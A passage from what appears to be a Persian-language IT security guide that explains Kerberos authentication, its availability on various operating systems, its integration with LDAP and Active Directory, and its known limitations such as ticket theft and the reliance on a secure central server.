‫ﮔﺮﻓﺘﻪ ﺷﺪﻩ ﺍﺳﺖ‪ ١٧٧.‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﻌﺪ ﺍﺯ ‪ ۸‬ﺳﺎﻋﺖ ﻣﺠﺪﺩﹰﺍ ﺑﺎﻳﺪ ﺑﺮﻧﺎﻣﺔ ‪ kinit‬ﺭﺍ ﺍﺟﺮﺍ ﻛﻨﻴﺪ ﻭ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﻳﻜﺒـﺎﺭ ﺩﻳﮕـﺮ‬
‫ﻭﺍﺭﺩ ﻛﻨﻴﺪ ﺗﺎ ﺍﺯ ﻃﺮﻳﻖ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ‪ Kerberos‬ﺑﺮﺍﻳﺘﺎﻥ ﻳﻚ ﺑﻠﻴﻂ ﺟﺪﻳﺪ ﺻﺎﺩﺭ ﺷﻮﺩ‪.‬‬
‫ﺩﺭ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﺗﻚ ﻛﺎﺭﺑﺮﻱ‪ Kerberos ،‬ﺍﻣﻨﻴﺖ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮﻱ ﺩﺭ ﻛﻨﺎﺭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﻌﻤﻮﻟﻲ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﮔﺮ ﺩﻭ ﻧﻔﺮ‬
‫ﺑﺼﻮﺭﺕ ﻫﻤﺰﻣﺎﻥ ﺑﻪ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻭﺍﺭﺩ ﺷﻮﻧﺪ‪ ،‬ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻫﺮ ﺩﻭ ﻛﺎﺭﺑﺮ ﺭﺍ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﻛﻨﺪ ﻭ ﺍﺯ ﺁﻥ ﭘـﺲ ﺍﻳـﻦ ﺩﻭ ﻛـﺎﺭﺑﺮ‬
‫ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧﺴﺖ ﺧﻮﺩ ﺭﺍ ﺑﺠﺎﻱ ﻳﻜﺪﻳﮕﺮ ﺟﺎ ﺑﺰﻧﻨﺪ‪ .‬ﺍﻳﻦ ﺗﻬﺪﻳﺪ ﺩﺭ ‪ MIT‬ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺑﻮﺩ‪ ،‬ﻟـﺬﺍ ﺧـﺪﻣﺎﺕ ﻭﺭﻭﺩ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺭﻭﻱ ﺍﻳـﺴﺘﮕﺎﻫﻬﺎﻱ‬
‫ﻛﺎﺭﻱ ﻏﻴﺮﻓﻌﺎﻝ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﺗﺎ ﻫﻨﮕﺎﻡ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻳﻚ ﻛﺎﺭﺑﺮ ﻣﺠﺎﺯ ﺍﺯ ﻭﺭﻭﺩ ﻣﻬﺎﺟﻤﻴﻦ ﺟﻠﻮﮔﻴﺮﻱ ﺷﻮﺩ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‬
‫ﻛﻪ ﻳﻜﻨﻔﺮ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺤﻠﻲ ﺭﺍ ﺗﺴﺨﻴﺮ ﻛﻨﺪ ﺗﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ ﺭﺍ ﻫﻨﮕﺎﻡ ﺗﺎﻳﭗ ﺷﺪﻥ ﺑﺪﺳﺖ ﺁﻭﺭﺩ‪.‬‬
‫ﺗﻬﻴﺔ ‪Kerberos‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻳﻤﻨﻲ ‪ Kerberos‬ﻳﺎ ﻣﺸﺎﺑﻪ ﺁﻥ ﺍﻣﺮﻭﺯﻩ ﺍﺯ ﻃﺮﻳﻖ ﭼﻨﺪﻳﻦ ﺷـﺮﻛﺖ ﺍﺭﺍﺋـﻪ ﻣـﻲﺷـﻮﻧﺪ‪ ،‬ﻭ ﻫﻤﭽﻨـﻴﻦ ﻳـﻚ ﻗـﺴﻤﺖ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻳﻲ ﻣﺜﻞ ‪ ،Mac OS X ،Solaris‬ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ‪ Linux‬ﻭ ‪ BSD‬ﺑﺸﻤﺎﺭ ﻣﻲﺁﻳﻨﺪ‪ .‬ﺍﺯ ‪ Windows 2000‬ﺑﻪ‬
‫ﺑﻌﺪ ﺩﺭ ‪ Microsoft Windows‬ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ‪ Kerberos 5‬ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳـﺖ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﺍﻳـﻦ ﺍﻣﻜـﺎﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﻣﻴـﺎﻥ‬
‫‪١٧٨‬‬
‫ﻣﺎﺷﻴﻨﻬﺎﻱ ‪ Unix‬ﻭ ﺑﺴﺘﺮﻫﺎﻱ ‪ Windows‬ﺑﺘﻮﺍﻥ ﺍﺯ ‪ Kerberos‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬
‫ﺍﮔﺮ ﺑﺎﻳﺪ ‪ Kerberos‬ﺭﺍ ﺍﺯ ﺍﺑﺘﺪﺍ ﻧﺼﺐ ﻛﻨﻴﺪ‪ ،‬ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ‪ Kerberos‬ﻣﺮﺑﻮﻁ ﺑﻪ ‪ MIT‬ﺑـﺮﺍﻱ ﺷـﻬﺮﻭﻧﺪﺍﻥ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﻭ ﻛﺎﻧـﺎﺩﺍ ﺩﺭ‬
‫ﺁﺩﺭﺱ ‪ http://web.mit.edu/kerberos/www/‬ﻭ ﺑـــﺮﺍﻱ ﺩﻳﮕـــﺮﺍﻥ ﺩﺭ ﺁﺩﺭﺱ ‪ http://www.crypto-publish.org‬ﻗﺎﺑـــﻞ‬
‫‪ ۱۷۷‬ﺩﺭ ﺑﻌﻀﻲ ﺍﺯ ﭘﻴﮑﺮﺑﻨﺪﻳﻬﺎ ﻣﻲﺗﻮﺍﻥ ﻳﻚ ﺣﺪﺍﻛﺜﺮ ﺯﻣﺎﻧﻲ ﺑﺮﺍﻱ ﻣﻌﺘﺒﺮ ﺑﺎﻗﻲ ﻣﺎﻧﺪﻥ ﻛﻠﻴﺪ ﺗﻌﻴﻴﻦ ﻛﺮﺩ‪.‬‬
‫‪ ۱۷۸‬ﺩﺭ ﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺗﻐﻴﻴﺮﺍﺕ ﺍﺧﺘﺼﺎﺻﻲ ﺑﻪ ﭘﺮﻭﺗﻜﻞ ‪ kerberos‬ﺩﺍﺩﻩ ﻛﻪ ﺍﺛﺮ ﺁﻥ ﻣﺠﺒﻮﺭ ﻛﺮﺩﻥ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫـﺎﻱ ‪ Windows‬ﺑـﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫‪ kerberos‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ Windows‬ﺍﺳﺖ‪ .‬ﻟﺬﺍ ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﻣﺨﻠﻮﻁ ‪ Windows‬ﻭ ﻳﻮﻧﻴﻜﺲ‪ ،‬ﺑﻬﺘﺮ ﺍﺳﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ kerberos‬ﻣﺎﺷـﻴﻨﻬﺎﻱ‬
‫‪ Windows 2000‬ﺑﺎﺷﻨﺪ ﺗﺎ ﺑﺘﻮﺍﻥ ﻫﻢ ﺍﺯ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ‪ Windows‬ﻭ ﻫﻢ ﺍﺯ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ‪ Unix‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫‪٣٤١‬‬
‫ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻦ ﺁﺩﺭﺳﻬﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺭﺗﻘﺎﻫﺎﻱ ﺭﺳﻤﻲ‪ ،‬ﺍﺻﻼﺣﻬﺎ‪ ،‬ﻭ ﺍﻃﻼﻋﻴـﻪﻫـﺎﻱ ﺍﻋـﻼﻡ ﻧﻘـﺎﻳﺺ ﺭﺍ ﻧﻴـﺰ ﺑﻴﺎﺑﻴـﺪ‪ .‬ﺩﺭ ‪Kerberos‬‬
‫ﭼﻨﺪﻳﻦ ﺍﺷﻜﺎﻝ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﻭﺟﻮﺩ ﺩﺍﺷﺖ؛ ﻟﺬﺍ ﺑﺴﻴﺎﺭ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺁﺧﺮﻳﻦ ﻧﺴﺨﺔ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻳﻚ ﭘﻴﺎﺩﻩﺳـﺎﺯﻱ‬
‫ﺭﺍﻳﮕﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ‪ Kerberos‬ﺑﻪ ﻧﺎﻡ "‪ "Heimdal‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺼﻮﺭﺕ ﭘﻮﻳﺎ ﺗﻮﺳﻌﻪ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ ﻭ ﺑـﺎ ‪ Kerberos‬ﻣﺮﺑـﻮﻁ ﺑـﻪ ‪MIT‬‬
‫ﻧﻴﺰ ﺑﺴﻴﺎﺭ ﺳﺎﺯﮔﺎﺭ ﺍﺳﺖ‪ .‬ﻣﻲﺗﻮﺍﻧﻴـﺪ ‪ Heimdal‬ﺭﺍ ﺍﺯ ﺁﺩﺭﺱ ‪ http://www.pdc.kth.se/heimdal/‬ﺗﻬﻴـﻪ ﻛﻨﻴـﺪ‪ .‬ﺗﻐﻴﻴـﺮﺍﺕ ﻻﺯﻡ ﺩﺭ‬
‫ﭘﻴﮑﺮﺑﻨﺪﻱ ﺑﺮﺍﻱ ﺳﺎﺯﮔﺎﺭﻱ ‪ Kerberos‬ﺑﺎ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﻫﺴﺘﻨﺪ؛ ﺍﮔﺮ ﺧﻮﺩﺗﺎﻥ ﺑﺎﻳﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺍﻋﻤـﺎﻝ ﻛﻨﻴـﺪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑـﺮﺍﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﺍﺳﻨﺎﺩ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺩﺭ ﺧﻮﺩ ‪ Kerberos‬ﺭﺟﻮﻉ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫‪ Kerberos‬ﻭ ‪LDAP‬‬
‫‪ Kerberos‬ﺑﺎ ‪) LDAP‬ﻛﻪ ﺩﺭ ﻗﺴﻤﺖ ﺑﻌﺪﻱ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ( ﺑﺨﻮﺑﻲ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﺗﺮﻛﻴﺐ ﻣﻲﺷﻮﻧﺪ‪ Kerberos .‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ‬
‫ﻫﻮﻳﺖ ﻭ ﺍﻳﻤﻦ ﻛﺮﺩﻥ ‪query‬ﻫﺎ ﻭ ﺍﺭﺗﻘﺎﻫﺎﻱ ‪ LDAP‬ﺑﻜﺎﺭ ﺭﻭﺩ‪ .‬ﺩﺭ ﻣﻘﺎﺑﻞ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ‪ LDAP‬ﻫـﻢ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻃﻼﻋـﺎﺕ ﻛـﺎﺭﺑﺮﺍﻥ ﻛـﻪ‬
‫ﭼﮕﺎﻟﺘﺮ ﺍﺯ ﺩﺍﺩﺓ ﺣﻔﺎﻇﺖﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﺗﻨﻬﺎ ‪ Kerberos‬ﺍﺳﺖ ‪ -‬ﻣﺜﻞ ﺩﺍﻳﺮﻛﺘﻮﺭﻱ ﺧﺎﻧﻪ ﻛﺎﺭﺑﺮ‪ ،‬ﭘﻮﺳﺘﻪ‪ ،‬ﺷـﻤﺎﺭﻩ ﺗﻠﻔـﻦ‪ ،‬ﻳـﺎ ﺩﻳﮕـﺮ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺳﺎﺯﻣﺎﻧﻲ ‪ -‬ﺭﺍ ﺫﺧﻴﺮﻩ ﻛﻨﺪ‪ .‬ﺩﺭ ﻣﺠﻤﻮﻉ‪ ،‬ﺍﻳﻦ ﺩﻭ ﺳﺮﻭﻳﺲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻫﻤﺔ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ‪ NIS‬ﻭ ‪ NIS+‬ﺭﺍ ﺍﺭﺍﺋﻪ ﻛﻨﻨﺪ ﻭ ﺑـﻪ ﻫﻤـﻴﻦ ﺩﻟﻴـﻞ ﻫـﻢ‬
‫‪١٧٩‬‬
‫ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪.‬‬
‫ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ‪ LDAP‬ﺑﺮﺍﻱ ﺫﺧﻴﺮﻩ ﻛﺮﺩﻥ ﻛﻠﻴﺪﻫﺎﻱ ‪ Kerberos‬ﺑﻜﺎﺭ ﻣـﻲﺭﻭﺩ‪ .‬ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ‪ Windows‬ﺍﺯ ‪ Kerberos‬ﺍﺯ ﺧـﺪﻣﺎﺕ‬
‫‪) Microsoft Active Directory‬ﻳﻚ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﺯ ‪ (LDAP‬ﺑـﺮﺍﻱ ﺫﺧﻴـﺮﺓ ﻛﻠﻴـﺪﻫﺎﻱ ‪ Kerberos‬ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨـﺪ‪Heimdal .‬‬
‫‪ Kerberos‬ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺭﺍ ﭘﺸﺘﻴﺎﺑﻲ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻣﺎ ‪ MIT Kerberos‬ﻧﻪ؛ ﻭ ﺍﻟﺒﺘﻪ ﺟﺎﻱ ﻧﮕﺮﺍﻧﻲ ﻧﻴﺴﺖ‪ ،‬ﭼﺮﺍﻛﻪ ﺩﺭ ‪ MIT Kerberos‬ﺍﻳﻦ‬
‫ﻛﻠﻴﺪﻫﺎ ﺩﺭ ﺧﻮﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ Kerberos‬ﺫﺧﻴﺮﻩ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ‪Kerberos‬‬
‫ﺍﮔﺮﭼﻪ ‪ Kerberos‬ﻳﻚ ﺭﺍﻩ ﺣﻞ ﻋﺎﻟﻲ ﺑﺮﺍﻱ ﻳﻚ ﻣﺸﻜﻞ ﺍﺳﺎﺳﻲ ﺍﺳﺖ ﺍﻣﺎ ﻫﻨﻮﺯ ﻫﻢ ﻧﻘﺎﻳﺺ ﺯﻳﺎﺩﻱ ﺩﺍﺭﺩ ﮐـﻪ ﺩﺭ ﺫﻳـﻼ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺷـﺎﺭﻩ‬
‫ﻣﻲﺷﻮﺩ‪:‬‬
‫ﻫﺮ ﺳﺮﻭﻳﺲ ﺷﺒﻜﻪ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺍﺧﺘﺼﺎﺻﻲ ﺑﺮﺍﻱ ﻛﺎﺭ ﺑﺎ ‪ Kerberos‬ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﻮﺩ‬
‫‪ Kerberos‬ﺩﺭ ﻣﺤﻴﻂ ﺍﺷﺘﺮﺍﻙ ﺯﻣﺎﻧﻲ ﺧﻮﺏ ﻛﺎﺭ ﻧﻤﻲﻛﻨﺪ‬
‫‪ Kerberos‬ﺑﺮﺍﻱ ﻣﺤﻴﻄﻲ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﻛﻪ ﺩﺭ ﻫﺮ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺁﻥ ﻳﻚ ﻛﺎﺭﺑﺮﺩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﮔﺮ ﻳﻚ ﻛﺎﺭﺑﺮ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﭼﻨـﺪ ﻧﻔـﺮ‬
‫ﺩﻳﮕﺮ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﻠﻴﻂ ﻛﺎﺭﺑﺮ ﺗﻮﺳـﻂ ﻳـﻚ ﻣﻬـﺎﺟﻢ ﺑـﻪ ﺳـﺮﻗﺖ ﺑـﺮﻭﺩ‪ .‬ﺩﺭ ﺁﻧـﺼﻮﺭﺕ ﺑﻠﻴﻄﻬـﺎﻱ‬
‫ﺩﺯﺩﻳﺪﻩﺷﺪﻩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻓﺮﻳﺒﻨﺪﻩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ‪.‬‬
‫‪ Kerberos‬ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﻳﻤﻦ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ‪ Kerberos‬ﻧﻴﺎﺯ ﺩﺍﺭﺩ‬
‫ﺑﺪﻟﻴﻞ ﻧﻮﻉ ﻃﺮﺍﺣﻲ‪ Kerberos ،‬ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﻳﻤﻦ ﻣﺮﻛﺰﻱ ﻧﻴﺎﺯ ﺩﺍﺭﺩ ﻛﻪ ﺣﺎﻭﻱ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﺍﺻـﻠﻲ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﻭ ﺑﻄـﻮﺭ‬
‫ﻣﺪﺍﻭﻡ ﺩﺭ ﺩﺳﺘﺮﺱ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﺍﻣﻨﻴﺖ‪ ،‬ﺳﺎﺯﻣﺎﻧﻬﺎ ﺩﻗﻴﻘـﹰﺎ ﺑﺎﻳـﺪ ﺍﺯ ﻫـﻴﭻ ﭼﻴـﺰﻱ ﻏﻴـﺮ ﺍﺯ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ‪Kerberos‬‬
‫‪ ۱۷۹‬ﺟﻴﺴﻦ ﻫﻴﺲ )‪ (Jason Heiss‬ﺭﺍﻫﻨﻤﺎﻱ ﺧﻮﺑﻲ ﺑﺮﺍﻱ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺩﺭ ﺻﻔﺤﻪﺍﻱ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺧـﻮﺩ ﺑﻨـﺎﻡ "ﺟـﺎﻳﮕﺰﻳﻨﻲ ‪ NIS‬ﺑـﺎ ‪ Kerberos‬ﻭ ‪ "LADP‬ﺩﺭ ﺁﺩﺭﺱ‬
‫‪ http://www.ofb.net/~jheiss/krbldap‬ﺍﺭﺍﺋﻪ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺑﻌﻠﺖ ﻃﺮﺍﺣﻲ ‪ ،Kerberos‬ﻫﺮ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﺍﺯ ‪ Kerberos‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﺑﺎﻳﺪ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﻮﺩ‪ .‬ﺭﻭﻧﺪ ﺍﻋﻤﺎﻝ ﺍﻳﻦ ﺗﻐﻴﻴـﺮﺍﺕ ﺭﻭﻱ‬
‫ﻻ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺑﺎﻳﺪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﺎﺷﺪ‪ ،‬ﻭ ﻳﺎ ﺑﺮﻧﺎﻣـﻪ‬
‫ﻻ "‪ "Kerberizing‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺯ ﻳﻚ ﭼﺎﺭﭼﻮﺏ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﻛﻪ ﺍﺯ ﻗﺒﻞ ﺑﺎ ‪ Kerberos‬ﺍﺩﻏﺎﻡ ﺷﺪﻩ )ﻣﺜﻞ ‪ PAM‬ﻛﻪ ﺩﺭ ﺍﻧﺘﻬﺎﻱ ﺍﻳﻦ ﻓﺼﻞ ﺩﺭ ﻣﻮﺭﺩ ﺁﻥ ﺑﺤﺚ ﺧﻮﺍﻫﺪ ﺷﺪ(‪.‬‬
‫‪٣٤٢‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻨﺪ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Kerberos‬ﺑﺎﻳﺪ ﻫﻤﻴﺸﻪ ﺗﺤﺖ ﻗﻔﻞ ﻭ ﻛﻠﻴﺪ ﻭ ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﻛﻪ ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜﻲ ﺍﻣﻦ ﺍﺳﺖ ﻧﮕﻬـﺪﺍﺭﻱ‬
‫ﺷﻮﺩ‪ .‬ﺍﮔﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Kerberos‬ﺧﺮﺍﺏ ﺷﻮﺩ‪ ،‬ﺗﻤﺎﻡ ﺷﺒﻜﺔ ‪ Kerberos‬ﻏﻴﺮﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Kerberos‬ﻫﻤﺔ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﺎ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺍﺻﻠﻲ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ‪ -‬ﻛﻪ ﺭﻭﻱ ﻫﻤـﺎﻥ ﺩﻳـﺴﻚ‬
‫ﺳﺨﺘﻲ ﻭﺍﻗﻊ ﺷﺪﻩ ﻛﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﻣﺰﺷﺪﻩ ﺩﺭ ﺁﻥ ﻫﺴﺘﻨﺪ ‪ -‬ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﺪ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﺎ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ‬
‫‪ Kerberos‬ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ‪ ،‬ﻫﻤﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﺗﻐﻴﻴﺮ ﻳﺎﺑﻨﺪ‪.‬‬
‫‪ Kerberos‬ﺗﻐﻴﻴﺮﺍﺕ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺳﻴﺴﺘﻤﻲ )ﺍﺳﺒﻬﺎﻱ ﺗﺮﻭﺍ( ﺭﺍ ﻧﺎﺩﻳﺪﻩ ﻣﻲﮔﻴﺮﺩ‬
‫‪ Kerberos‬ﺑﺎﻋﺚ ﻧﻤﻲﺷﻮﺩ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻣﺤﻠﻲ‪ ،‬ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻨﺪ ‪ -‬ﻳﻌﻨﻲ ﺑـﺮﺍﻱ ﻛـﺎﺭﺑﺮﻱ ﻛـﻪ ﭘـﺸﺖ ﺭﺍﻳﺎﻧـﻪ‬
‫ﻧﺸﺴﺘﻪ ﻫﻴﭻ ﺭﺍﻫﻲ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﻔﻬﻤﺪ ﺭﺍﻳﺎﻧﻪ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ ﻳﺎ ﻧﻪ‪ .‬ﺍﻳﻦ ﻛﻤﺒﻮﺩ ﺑﺮﺍﺣﺘﻲ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻢ ﺁﮔﺎﻩ ﺑﻪ ﺍﻳﻦ‬
‫ﻣﺴﺌﻠﻪ ﻣﻮﺭﺩ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺍﻳﻦ ﻣﺸﻜﻼﺕ ﭘﻴﺎﻣﺪﻫﺎﻱ ﺍﻳﻦ ﺣﻘﻴﻘﺖ ﻫﺴﺘﻨﺪ ﻛﻪ ﺣﺘﻲ ﺩﺭ ﻳﻚ ﺷﺒﻜﻪ‪ ،‬ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﺴﺘﮕﺎﻫﻬﺎﻱ‬
